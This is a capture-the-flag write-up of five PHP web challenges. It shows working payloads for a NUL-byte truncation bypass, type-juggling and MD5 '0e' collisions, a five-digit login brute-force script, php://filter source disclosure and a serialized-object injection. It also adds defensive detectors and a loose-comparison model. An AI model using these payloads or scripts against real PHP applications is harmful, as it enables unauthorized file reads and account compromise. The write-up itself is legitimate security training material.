4th Shian Cup (世安杯) Writeup: Web

Web challenges

1. CTF entry-level challenge

The challenge provides its source code; download it:

<?php
$flag = '*********';
if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
        echo '<p class="alert">You password must be alphanumeric</p>';
    else if (strpos ($_GET['password'], '--') !== FALSE)
        die($flag);
    else
        echo '<p class="alert">Invalid password</p>';
}
?>
<section class="login">
    <div class="title">
        <a href="./index.phps">View Source</a>
    </div>
    <form method="POST">
        <input type="text" required name="password" placeholder="Password" /><br/>
        <input type="submit"/>
    </form>
</section>
</body>
</html>

Use %00 to truncate the string as ereg() sees it without affecting strpos(): ereg() stops at the first NUL byte, so "123" passes the alphanumeric check, while the binary-safe strpos() still finds the "--" after the NUL.

http://ctf1.shiyanbar.com/shian-rao/index.php?password=123%00--

This yields the flag.
(screenshot: 图片1.png)

2. Cookie

http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=a2V5LnR4dA==
There are two parameters, line and file. The value of file is base64-encoded and decodes to key.txt. Changing line shows nothing, so set file to the base64 encoding of index.php and read the source line by line by incrementing line:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=a2V5LnR4dA==");
$file_list = array(
    '0' =>'key.txt',
    '1' =>'index.php',
);
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){
    $file_list[2]='thisis_flag.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>

This shows that when the cookie key equals li_lr_480, thisis_flag.php is added to the allowed list. Set file to the base64 encoding of thisis_flag.php, set the cookie, and the page prints the flag directly.
(screenshot: 图片2.png)

3. Types

<?php
show_source(__FILE__);
$a=0;
$b=0;
$c=0;
$d=0;
if (isset($_GET['x1']))
{
    $x1 = $_GET['x1'];
    $x1=="1"?die("ha?"):NULL;
    switch ($x1)
    {
        case 0:
        case 1:
            $a=1;
            break;
    }
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
    is_numeric(@$x2["x21"])?die("ha?"):NULL;
    if(@$x2["x21"]){
        ($x2["x21"]>2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
    }
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}
if($a && $b && $c && $d){
    include "flag.php";
    echo $flag;
}
?>

Reading the source: x1 can be any non-numeric string (the switch compares loosely, so a string like "abc" matches case 0); x2["x21"] can be any non-empty array (is_numeric() rejects it as numeric, but an array compares greater than 2017); x2["x22"] must have length 2, with the first element an array and the second element 0 (array_search() finds "XIPU" loosely equal to 0, while the strict === check in the loop does not trigger).
x3 is checked by comparing MD5 substrings. Characters 8 through 24 of md5('15562') turn out to be "0e" followed by digits. In a loose comparison PHP reads such a string as scientific notation, and 0 times any power of 10 is still 0, so any other "0e" + digits string compares equal. Brute-force a candidate with Python.

import hashlib

def crack():
    a1 = 1
    while True:
        a2 = "XIPU" + str(a1)
        smd5 = hashlib.md5(a2.encode()).hexdigest()
        # substr(md5($x3), 8, 16) must be "0e" followed only by digits
        if smd5[8:10] == "0e" and smd5[10:24].isdigit():
            print(a2 + " " + smd5)
        a1 += 1

crack()

Some strings that meet the condition, with their MD5 hashes:

XIPU18570 026cba5c0e20905432015695e9eb13ba
XIPU147389 bb3300470e307795644787782e2e7bf2
XIPU150292 34e905dd0e78555952191976ee5d0596
XIPU313592 defe9f960e3597811193469169f82606
XIPU510852 7711559b0e8357069621509019670050
XIPU573493 a50c25840e441898552621207e1c227d
XIPU588288 989cc9b20e46969007951577167c1e6c
XIPU596657 f6aebdca0e259354386697922d607514
XIPU637757 d4a72d140e25939982557071917ec8d1

Construct the payload:

http://ctf1.shiyanbar.com/shian-leixing/index.php?x1=abc&x2={"x21":[15],"x22":[[15],0]}&x3=XIPU18570
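As an added example (not part of the writeup), the following Python models the PHP loose comparison that makes the x3 check pass, so the effect can be verified without a PHP interpreter. PHP treats a string that looks like a number, including exponent notation such as "0e12345", as numeric, and compares two numeric strings by value rather than byte by byte; `===` and `hash_equals()` compare bytes and are not affected. The numeric-string grammar is simplified (no surrounding whitespace) and the sample strings are constructed.

```python
import hashlib
import re

# Simplified PHP numeric-string grammar: optional sign, digits with optional
# fraction, optional exponent. Leading/trailing whitespace is not modelled.
_PHP_NUMERIC = re.compile(r"[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?")


def php_is_numeric_string(s: str) -> bool:
    return _PHP_NUMERIC.fullmatch(s) is not None


def php_loose_equals(a: str, b: str) -> bool:
    """Approximate PHP's `$a == $b` for two strings (PHP 5 through 8).

    Two numeric strings compare by numeric value; anything else compares
    as bytes. PHP compares huge integer-like strings with arbitrary
    precision; this model uses float, which is enough for the "0e" case.
    """
    if php_is_numeric_string(a) and php_is_numeric_string(b):
        return float(a) == float(b)
    return a == b


def php_strict_equals(a: str, b: str) -> bool:
    """PHP's `$a === $b` (and hash_equals()): byte-for-byte equality only."""
    return a == b


def md5_window(s: str) -> str:
    """substr(md5($s), 8, 16) from the challenge: 16 hex chars from offset 8."""
    return hashlib.md5(s.encode()).hexdigest()[8:24]


def is_zero_e_hash(window: str) -> bool:
    """True when the window is '0e' followed only by digits, i.e. PHP reads it as 0.0."""
    return window.startswith("0e") and window[2:].isdigit()


if __name__ == "__main__":
    # Constructed pairs: the left value is the window of XIPU18570's MD5 as listed above.
    pairs = [("0e20905432015695", "0e4328751340"),
             ("0e20905432015695", "0f20905432015695")]
    for a, b in pairs:
        print(f"{a} vs {b}: loose={php_loose_equals(a, b)} strict={php_strict_equals(a, b)}")
    print("XIPU18570 window:", md5_window("XIPU18570"), is_zero_e_hash(md5_window("XIPU18570")))
```

The fix on the application side is the strict form: compare full digests with `hash_equals()` (or `===`), never with `==` on substrings.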

4. Login

http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password=00000&randcode=315

The hint says the password is a five-digit number, and there is a captcha (randcode), so script it in Python:

import re
import requests

se = requests.session()
for pwd in range(0, 100000):
    # fetch the login page to read the current captcha value, then submit it with the guess
    html = se.get("http://ctf1.shiyanbar.com/shian-s").text
    pattern = re.compile(r"(?<=<br><br>).*(?=<br><br>)")
    num = re.findall(pattern, html)[0]
    pwd = str(pwd).zfill(5)
    flagstr = "http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password=" + pwd + "&randcode=" + num
    flag = se.get(flagstr).text
    if "flag{" in flag:
        print()
        print('password :' + pwd)
        break
    else:
        print(pwd)

The brute force finds the password 00315; logging in returns the flag.
(screenshot: flag.png)
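The script above works because the captcha is readable by the same client that submits the guess, so it adds no cost per attempt; the only thing that stops a five-digit space is limiting attempts. As an added example (not from the writeup), here is a sliding-window detector that reads constructed access-log lines for the login endpoint and alerts when one source IP makes more than THRESHOLD attempts against one username within WINDOW seconds. The log format, field names and thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

THRESHOLD = 20  # attempts per (ip, username) before alerting (assumed)
WINDOW = 60     # seconds (assumed)

# Assumed combined-log-style line: ip - - [timestamp] "GET path HTTP/1.x" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "GET (?P<path>\S+) HTTP/1\.[01]" (?P<status>\d{3})'
)
PARAM_RE = re.compile(r"[?&]username=([^&]*)")


def parse_line(line):
    """Return (ip, timestamp, username) for a login request, or None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S")
    user_m = PARAM_RE.search(m.group("path"))
    return m.group("ip"), ts, (user_m.group(1) if user_m else None)


def detect_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return [(ip, username, attempts_in_window)], one alert per offending pair."""
    recent = defaultdict(deque)  # (ip, user) -> timestamps inside the window
    alerted = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[2] is None:
            continue
        ip, ts, user = parsed
        q = recent[(ip, user)]
        q.append(ts)
        # drop attempts older than the window; q always keeps the current one
        while (ts - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) > threshold and (ip, user) not in alerted:
            alerted[(ip, user)] = len(q)
    return [(ip, user, n) for (ip, user), n in alerted.items()]


def make_sample_log():
    """Constructed log: one scripted guesser plus a legitimate user with two attempts."""
    lines = []
    for i in range(30):  # 30 guesses from 10.0.0.5 within 30 seconds
        ts = f"01/Jan/2018:10:00:{i:02d}"
        lines.append(f'10.0.0.5 - - [{ts}] "GET /shian-s/index.php?username=admin'
                     f'&password={i:05d}&randcode=123 HTTP/1.1" 200')
    lines.append('10.0.0.9 - - [01/Jan/2018:10:00:10] "GET /shian-s/index.php?username=bob'
                 '&password=00001&randcode=5 HTTP/1.1" 200')
    lines.append('10.0.0.9 - - [01/Jan/2018:10:05:10] "GET /shian-s/index.php?username=bob'
                 '&password=00002&randcode=7 HTTP/1.1" 200')
    return lines


if __name__ == "__main__":
    for ip, user, n in detect_bruteforce(make_sample_log()):
        print(f"ALERT {ip} -> {user}: {n} attempts within {WINDOW}s")
```

Keying on (ip, username) catches the single-source loop shown in the script; a distributed guesser would need the same window keyed on username alone, which is the same code with the key changed.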

5. Admin

Read the source:
(screenshot: 图片3.png)

Using the php://input stream wrapper passes the first check: file_get_contents($user) then returns the POST body, so sending "the user is admin" as the body satisfies the comparison.
(screenshot: 图片4.png)

Then use php://filter to output the file base64-encoded:

http://ctf1.shiyanbar.com/shian-du/index?user=php://input&file=php://filter/convert.base64_encode/resource=index.php&pass=1

Decoding the output gives index.php:

<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}
?>
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
-->

Next read class.php the same way; decoded:

<?php
class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}

Construct a serialized Read object to read f1a9.php (the preg_match filter only inspects $file, not $pass):

http://ctf1.shiyanbar.com/shian-du/index?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1a9.php";}

Through the PHP deserialization vulnerability, echo $pass invokes Read::__toString(), which reads f1a9.php through the php://filter wrapper and prints it base64-encoded.
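The payloads in challenges 1, 2 and 5 share a property a defender can use: each leaves a recognisable indicator in the query string (a NUL byte, a base64 value that decodes to a .php path, a php:// stream wrapper, or a serialized PHP object). As an added example that is not part of the writeup, the following Python audits a request URL for those indicators, as a WAF rule or a log review would. Percent-decoding is done by hand so that %00 becomes a real NUL byte, the way PHP populates $_GET. The wrapper list and the sample requests (built from the URLs in this writeup) are constructed.

```python
import base64
import re
from urllib.parse import urlsplit, unquote

# Stream wrappers worth flagging in a parameter that may reach include()/file_get_contents().
WRAPPER_RE = re.compile(r"^(?:php|data|expect|phar|zip|glob)://", re.IGNORECASE)
# Start of a serialized PHP object: O:<len>:"<Class>":<count>:{
SERIALIZED_OBJECT_RE = re.compile(r'(?:^|[;{])O:\d+:"[A-Za-z_][A-Za-z0-9_\\]*":\d+:\{')
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _query_params(url):
    """Yield (name, value) pairs, percent-decoded; splits on '&' only."""
    for pair in urlsplit(url).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote(name), unquote(value)


def _base64_script_path(value):
    """Return the decoded text if `value` is base64 for a .php path, else None."""
    if len(value) % 4 or not B64_RE.match(value):
        return None
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.lower().endswith(".php") else None


def audit_request(url):
    """Return a sorted list of (parameter, indicator) findings for one request URL."""
    findings = set()
    for name, value in _query_params(url):
        if "\x00" in value:
            findings.add((name, "nul-byte"))
        if WRAPPER_RE.match(value):
            findings.add((name, "stream-wrapper"))
        if SERIALIZED_OBJECT_RE.search(value):
            findings.add((name, "serialized-object"))
        decoded = _base64_script_path(value)
        if decoded is not None:
            findings.add((name, "base64-script-path:" + decoded))
    return sorted(findings)


# Constructed from the requests shown in this writeup (aW5kZXgucGhw is base64 of index.php).
SAMPLE_REQUESTS = [
    "http://ctf1.shiyanbar.com/shian-rao/index.php?password=123%00--",
    "http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=a2V5LnR4dA==",
    "http://ctf1.shiyanbar.com/shian-quqi/index.php?line=0&file=aW5kZXgucGhw",
    "http://ctf1.shiyanbar.com/shian-du/index?user=php://input"
    "&file=php://filter/convert.base64_encode/resource=index.php&pass=1",
    'http://ctf1.shiyanbar.com/shian-du/index?user=php://input&file=class.php'
    '&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1a9.php";}',
]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(url)
        for finding in audit_request(url):
            print("   ", finding)
```

The base64 check reports only values that decode to a .php path, so the legitimate key.txt request from challenge 2 produces no finding while the source-reading request does; the wrapper check matches only at the start of a value, which is where PHP resolves it.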